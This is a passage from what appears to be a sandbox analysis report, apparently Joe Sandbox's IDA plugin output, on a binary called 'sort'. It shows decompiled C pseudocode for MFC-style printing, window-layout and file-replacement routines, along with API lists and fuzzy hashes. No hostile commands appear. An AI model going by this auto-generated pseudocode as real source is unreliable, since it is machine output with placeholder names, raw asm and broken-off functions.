							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								L27:
								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
								__eflags = _t449 - _t383;
								 *(_t463 - 0x10) = _t449;
								if(_t449 < _t383) {
									 *(_t463 - 0x10) = _t383;
								}
								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
								__eflags =  *(_t463 - 0x10) - _t266;
								if( *(_t463 - 0x10) > _t266) {
									 *(_t463 - 0x10) = _t266;
								}
								__eflags = _t461 - _t383;
								if(_t461 < _t383) {
									_t461 = _t383;
								}
								__eflags = _t461 - _t266;
								if(_t461 > _t266) {
									_t461 = _t266;
								}
								__eflags =  *(_t463 - 0x10) - _t461;
								asm("sbb eax, eax");
								_t268 = (_t266 & 0x000000fe) + 1;
								__eflags =  *(_t463 - 0x10) - 0xffff;
								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
								if(__eflags != 0) {
									_t151 = _t463 - 0x10;
									 *_t151 =  *(_t463 - 0x10) + _t268;
									__eflags =  *_t151;
								} else {
									 *(_t463 - 0x10) = 0xffff;
								}
								E00417214(_t463 - 0x20, __eflags, 0xf043);
								__eflags =  *(_t463 - 0x7c);
								 *(_t463 - 0x1c) = 0;
								if( *(_t463 - 0x7c) == 0) {
									__eflags = _t461 -  *(_t463 - 0x10);
									 *(_t463 - 0x6c) = _t461;
									if(_t461 ==  *(_t463 - 0x10)) {
										goto L53;
									} else {
										while(1) {
											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
											__eflags =  *(_t463 - 0x70);
											if( *(_t463 - 0x70) == 0) {
												goto L51;
											}
											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
											_t468 = _t468 + 0xc;
											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
											_t296 = StartPage( *(_t463 - 0x30));
											__eflags = _t296;
											if(_t296 < 0) {
												L50:
												_t452 =  *((intOrPtr*)(_t463 - 0x24));
												 *(_t463 - 0x1c) = 1;
											} else {
												__eflags =  *0x439c48; // 0x1
												_t455 =  *((intOrPtr*)(_t463 - 0x24));
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
												}
												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
												__eflags = EndPage( *(_t463 - 0x30));
												if(__eflags < 0) {
													goto L50;
												} else {
													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L50;
													} else {
														_t452 =  *((intOrPtr*)(_t463 - 0x24));
														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
															continue;
														} else {
														}
													}
												}
											}
											goto L51;
										}
										goto L51;
									}
								} else {
									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
									L51:
									__eflags =  *(_t463 - 0x7c);
									if( *(_t463 - 0x7c) == 0) {
										__eflags =  *(_t463 - 0x1c);
										if( *(_t463 - 0x1c) != 0) {
											AbortDoc( *(_t463 - 0x30));
										} else {
											L53:
											EndDoc( *(_t463 - 0x30));
										}
									}
								}
								E004166CE(E00404DAE(), 1);
								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
								E00413F6F(_t463 - 0xf0);
								E00419BEE(_t463 - 0x34);
							} else {
								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
								__eflags = _t310 - 0xffffffff;
								if(_t310 != 0xffffffff) {
									goto L27;
								} else {
									E004166CE(E00404DAE(), 1);
									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
									E00413F6F(_t463 - 0xf0);
									E00419BEE(_t463 - 0x34);
									_push(0xffffffff);
									_push(0);
									_push(0xf106);
									E0041BB7E(_t463 - 0x34, __eflags);
								}
							}
							 *(_t463 - 4) = 0xe;
							E00416AEC(_t463 - 0x20);
							 *(_t463 - 4) = 0xd;
							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
							E00411D13(_t463 - 0xf0);
							 *(_t463 - 4) = 0xb;
							E00419C1F(_t463 - 0x34);
							 *(_t463 - 4) = 0xa;
							E00416AEC(_t463 - 0x38);
							 *(_t463 - 4) = 1;
							_t396 = _t463 - 0x14;
						} else {
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								goto L12;
							} else {
								E00416B16(_t463 - 0x1c, _t463, 0xf045);
								 *(_t463 - 4) = 2;
								E00416B16(_t463 - 0x40, _t463, 0xf046);
								 *(_t463 - 4) = 3;
								E00416B16(_t463 - 0x44, _t463, 0xf047);
								 *(_t463 - 4) = 4;
								E00416B16(_t463 - 0x10, _t463, 0xf048);
								_push(0);
								_push( *((intOrPtr*)(_t463 - 0x44)));
								 *(_t463 - 4) = 5;
								_push(6);
								_push( *((intOrPtr*)(_t463 - 0x40)));
								_push( *(_t463 - 0x1c));
								_push(0);
								E00410385(_t463 - 0x338);
								 *(_t463 - 4) = 6;
								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
								_t335 = E004104E7(0);
								__eflags = _t335 - 1;
								if(_t335 == 1) {
									_push(_t463 - 0x18);
									_t337 = E004105C2(_t463 - 0x338);
									 *(_t463 - 4) = 8;
									E00416B95(_t463 - 0x3c, _t463, _t337);
									 *(_t463 - 4) = 6;
									E00416AEC(_t463 - 0x18);
									 *(_t463 - 4) = 9;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									E00416AEC(_t463 - 0x1c);
									goto L12;
								} else {
									 *(_t463 - 4) = 7;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									_t396 = _t463 - 0x1c;
								}
							}
						}
						E00416AEC(_t396);
						 *(_t463 - 4) = 0;
						E00416AEC(_t463 - 0x3c);
					}
				} else {
					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
						L5:
						 *(_t463 - 0x74) = 1;
						goto L6;
					} else {
						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						_t473 =  *((intOrPtr*)(_t357 + 0x10));
						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
							goto L5;
						} else {
							_push(0xffffffff);
							_push(0);
							_push(0xf106);
							E0041BB7E(_t448, _t473);
						}
					}
				}
				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
				_t228 = E004288AC(_t463 - 0x80);
				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
				return _t228;
			}

APIs

__EH_prolog.LIBCMT ref: 00428108

Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829

Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D

CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
UpdateWindow.USER32(?), ref: 004284C0
StartDocA.GDI32(?,?), ref: 004284D5
EndDoc.GDI32(?), ref: 004286BF

Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
String ID:
API String ID: 900908304-0
Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D717, Relevance: 21.4, APIs: 14, Instructions: 390
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				struct tagRECT _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				long _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				int _v136;
				char _v144;
				intOrPtr* _t191;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr _t213;
				signed int _t215;
				long _t218;
				signed int _t219;
				signed int _t225;
				void* _t229;
				intOrPtr* _t231;
				intOrPtr _t238;
				intOrPtr _t239;
				int _t244;
				signed int _t245;
				signed int _t249;
				signed int _t251;
				signed int _t256;
				long _t263;
				intOrPtr _t264;
				int _t269;
				signed int _t273;
				signed int _t277;
				long _t285;
				void* _t293;
				signed int _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t305;
				long _t312;
				int _t322;
				long _t327;
				signed int _t333;
				intOrPtr _t336;
				RECT* _t341;
				signed int _t342;
				intOrPtr* _t343;
				int _t345;

				_t293 = __ebx;
				_t336 = __ecx;
				_v68 = __ecx;
				_t191 = E0041E6BA( &_v64, _a8, _a12);
				_t341 = _t336 + 0x94;
				_v12 =  *_t191;
				_v8 =  *((intOrPtr*)(_t191 + 4));
				if(IsRectEmpty(_t341) != 0) {
					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
					_t197 = _v88.right - _v88.left;
					_t305 = _v88.bottom - _v88.top;
				} else {
					_t197 = _t341->right - _t341->left;
					_t305 = _t341->bottom - _t341->top;
				}
				_t342 = 0;
				_v48 = _t197;
				_v44 = _t305;
				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
				} else {
					_v136 = 0;
				}
				_t199 =  *0x439bf0; // 0x2
				_push(_t293);
				_t294 =  *0x439bf4; // 0x2
				_v40 = _t342;
				_t295 =  ~_t294;
				_v56 =  ~_t199;
				_v36 = _t342;
				_v16 = _t342;
				if( *(_t336 + 0x84) <= _t342) {
					L73:
					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
						EndDeferWindowPos(_v136);
					}
					SetRectEmpty( &_v104);
					E0041F52D(_t336,  &_v104, _a12);
					if(_a8 == _t342 || _a12 == _t342) {
						if(_v12 != _t342) {
							_v12 = _v12 + _v104.left - _v104.right;
						}
					}
					if(_a8 == _t342 || _a12 != _t342) {
						if(_v8 != _t342) {
							_v8 = _v8 + _v104.top - _v104.bottom;
						}
					}
					_t205 = _a4;
					 *_t205 = _v12;
					 *((intOrPtr*)(_t205 + 4)) = _v8;
					return _t205;
				} else {
					do {
						_t343 = E0041DD28(_t336, _v16);
						_v72 = _t343;
						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
						if(_t343 == 0) {
							if(_t213 != 0) {
								goto L71;
							}
							L58:
							_t215 = _v40;
							if(_t215 != 0) {
								if(_a12 == 0) {
									_t312 = _v56 + _t215 -  *0x439bf0;
									_v56 = _t312;
									if(_v12 <= _t312) {
										_v12 = _t312;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t299 =  *0x439bf4; // 0x2
									_t295 =  ~_t299;
								} else {
									_t295 = _t295 + _t215 -  *0x439bf4;
									_t218 = _v56;
									if(_v12 <= _t218) {
										_v12 = _t218;
									}
									if(_v8 <= _t295) {
										_v8 = _t295;
									}
									_t219 =  *0x439bf0; // 0x2
									_v56 =  ~_t219;
								}
								_v40 = _v40 & 0x00000000;
							}
							goto L71;
						}
						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
							L51:
							if(_v36 != 0) {
								goto L71;
							}
							L52:
							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
							goto L71;
						}
						_t225 =  *(_t343 + 0x64);
						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
							asm("sbb eax, eax");
							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
						} else {
							_t229 = 6;
						}
						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
						_t327 = _v56;
						_v64 =  *_t231;
						_v60 =  *((intOrPtr*)(_t231 + 4));
						_v32.left = _t327;
						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
						_v32.right =  *_t231 + _t327;
						_v32.top = _t295;
						GetWindowRect( *(_t343 + 0x1c),  &_v88);
						E0041A2F1(_t336,  &_v88);
						_t322 = 0;
						if(_a12 == 0) {
							_t238 = _v88.top;
							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, 0, _t238 - _v32.top);
								_t322 = 0;
							}
							_t239 = _v32.bottom;
							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
								_t256 = _t333;
								if(_t333 <= _t295) {
									_t256 = _t295;
								}
								OffsetRect( &_v32, _t322, _t256 - _v32.top);
								_t322 = 0;
							}
							if(_v36 == _t322) {
								if(_v32.top < _v44 -  *0x439bf4) {
									goto L44;
								}
								_t249 = _v16;
								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
									goto L44;
								} else {
									goto L56;
								}
							} else {
								_t251 =  *0x439bf4; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
								L44:
								_t244 = EqualRect( &_v32,  &_v88);
								if(_t244 == 0) {
									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t343 = _v72;
										_t336 = _v68;
									}
									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
								}
								_t245 = _v64;
								_t295 = _v32.top -  *0x439bf4 + _v60;
								if(_v40 > _t245) {
									goto L52;
								} else {
									_v40 = _t245;
									goto L51;
								}
							}
						} else {
							_t263 = _v88.left;
							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
								OffsetRect( &_v32, _t263 - _v32.left, 0);
								_t322 = 0;
							}
							_t264 = _v32.right;
							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
								L22:
								if(_v36 == _t322) {
									if(_v32.left < _v48 -  *0x439bf0) {
										L27:
										_t269 = EqualRect( &_v32,  &_v88);
										if(_t269 == 0) {
											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t343 = _v72;
												_t336 = _v68;
											}
											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
										}
										_v56 = _v64 -  *0x439bf0 + _v32.left;
										_t273 = _v60;
										if(_v40 <= _t273) {
											_v40 = _t273;
										}
										goto L52;
									}
									_t249 = _v16;
									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
										goto L27;
									} else {
										L56:
										_t345 = 1;
										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
										_v36 = _t345;
										goto L58;
									}
								}
								_t277 =  *0x439bf0; // 0x2
								_v36 = _t322;
								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
								goto L27;
							} else {
								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
								if(_t285 <= _v56) {
									_t285 = _v56;
								}
								OffsetRect( &_v32, _t285 - _v32.left, _t322);
								_t322 = 0;
								goto L22;
							}
						}
						L71:
						_v16 = _v16 + 1;
					} while (_v16 <  *(_t336 + 0x84));
					_t342 = 0;
					goto L73;
				}
			}

APIs

IsRectEmpty.USER32 ref: 0041D748
GetClientRect.USER32 ref: 0041D76D
BeginDeferWindowPos.USER32 ref: 0041D79D
GetWindowRect.USER32 ref: 0041D862
OffsetRect.USER32(?,?,00000000), ref: 0041D894
OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
EqualRect.USER32 ref: 0041D921
OffsetRect.USER32(?,00000000,?), ref: 0041D99B
OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
EqualRect.USER32 ref: 0041DA03
EndDeferWindowPos.USER32(?), ref: 0041DB48
SetRectEmpty.USER32(?), ref: 0041DB52

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418E48, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 168
stringlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00418E48(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				void* _t60;
				CHAR* _t61;
				_Unknown_base(*)()* _t67;
				void* _t70;
				CHAR* _t73;
				short* _t79;
				CHAR* _t82;
				short* _t88;
				CHAR* _t91;
				void* _t112;
				long _t114;
				short* _t116;
				intOrPtr _t118;
				int _t122;
				int _t124;
				int _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				short* _t133;
				intOrPtr _t135;

				E00406520(E00429FEC, _t127);
				_t130 = _t129 - 0x20;
				_t118 = __ecx;
				_push(_t112);
				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
				E00416861(_t127 - 0x18, __ecx + 0xc);
				 *(_t127 - 4) = 0;
				E004179D8(_t118, _t112, _t118);
				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
					_t61 =  *0x436980; // 0x436994
					_t114 = 0;
					 *(_t127 - 0x14) = _t61;
					_t135 =  *0x439c38; // 0x0
					 *(_t127 - 4) = 1;
					if(_t135 != 0) {
						L15:
						E00417B0B( *(_t127 - 0x18));
						goto L16;
					} else {
						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
						_t136 = _t67;
						 *(_t127 - 0x2c) = _t67;
						if(_t67 == 0) {
							goto L15;
						} else {
							_push(0);
							_push( *(_t118 + 0x10));
							_push(_t127 - 0x28);
							_t70 = E00418BE2(_t136);
							_t133 = _t130 + 0xc;
							 *(_t127 - 4) = 2;
							E00416B95(_t127 - 0x14, _t127, _t70);
							_t111 = _t127 - 0x28;
							 *(_t127 - 4) = 1;
							E00416AEC(_t127 - 0x28);
							_t73 =  *(_t127 - 0x14);
							 *(_t127 - 0x10) = _t73;
							if(_t73 != 0) {
								_t122 = lstrlenA(_t73) + 1;
								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
								_t79 = _t133;
								 *(_t127 - 0x24) = _t79;
								 *_t79 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
								 *(_t127 - 0x20) =  *(_t127 - 0x24);
							} else {
								 *(_t127 - 0x20) = 0;
							}
							_t82 =  *(_t118 + 0x10);
							 *(_t127 - 0x10) = _t82;
							if(_t82 != 0) {
								_t124 = lstrlenA(_t82) + 1;
								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
								_t88 = _t133;
								 *(_t127 - 0x24) = _t88;
								 *_t88 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								 *(_t127 - 0x24) = 0;
							}
							_t91 =  *(_t127 - 0x18);
							 *(_t127 - 0x10) = _t91;
							if(_t91 != 0) {
								_t126 = lstrlenA(_t91) + 1;
								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
								_t116 = _t133;
								 *_t116 = 0;
								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
							} else {
								_t116 = 0;
							}
							_push(0);
							_push(0);
							_push(3);
							_push( *(_t127 - 0x20));
							_push( *(_t127 - 0x24));
							_push(_t116);
							if( *(_t127 - 0x2c)() != 0) {
								E00417B0B( *(_t127 - 0x14));
							} else {
								_t114 = GetLastError();
								if(_t114 == 0x498 || _t114 == 0) {
									goto L15;
								}
								L16:
								if(_t114 == 0x499) {
									E00417B0B( *(_t127 - 0x14));
								}
								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
							}
						}
					}
					 *(_t127 - 4) = 0;
					E00416AEC(_t127 - 0x14);
				}
				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
				_t60 = E00416AEC(_t127 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
				return _t60;
			}

APIs

__EH_prolog.LIBCMT ref: 00418E4D

Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876

Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C

GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC

Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

lstrlenA.KERNEL32(?), ref: 00418EFD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB

Strings

ReplaceFile, xrefs: 00418EA6
KERNEL32, xrefs: 00418E9B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
String ID: KERNEL32$ReplaceFile
API String ID: 3306742873-430465611
Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422A19, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00422A19(void* __edi, void* __esi) {
				void* _t28;
				void* _t31;
				void* _t42;
				struct HFONT__* _t50;
				void* _t53;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t70;
				intOrPtr _t76;
				void* _t77;
				void* _t79;
				void* _t86;

				_t67 = __esi;
				_t64 = __edi;
				_t28 = E00406520(E0042A954, _t70);
				_t76 =  *0x439c44; // 0x1
				if(_t76 != 0) {
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
					return _t28;
				}
				E00425F56(0xa);
				_t77 =  *0x439ca4; // 0x0
				if(_t77 == 0) {
					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
					 *0x439ca4 = _t53;
					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
					}
				}
				_t79 =  *0x439ca0; // 0x0
				if(_t79 != 0) {
					L11:
					_push(_t67);
					_push(_t64);
					_push(0);
					E0041A369(_t70 - 0x24, _t82);
					_t31 =  *0x439ca0; // 0x0
					 *(_t70 - 4) = 0;
					if(_t31 == 0) {
						_t65 = 0;
						__eflags = 0;
					} else {
						_t65 = SelectObject( *(_t70 - 0x20), _t31);
					}
					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
					if(_t65 != 0) {
						SelectObject( *(_t70 - 0x20), _t65);
					}
					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
						L18:
						E0041A89B(0x439ca0);
						goto L19;
					} else {
						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
						if(_t86 <= 0) {
							L19:
							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
							E0041A3DB(_t70 - 0x24);
							goto L20;
						}
						goto L18;
					}
				} else {
					E00406330(_t70 - 0x60, 0, 0x3c);
					 *((char*)(_t70 - 0x49)) = 1;
					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
					_t42 = 1;
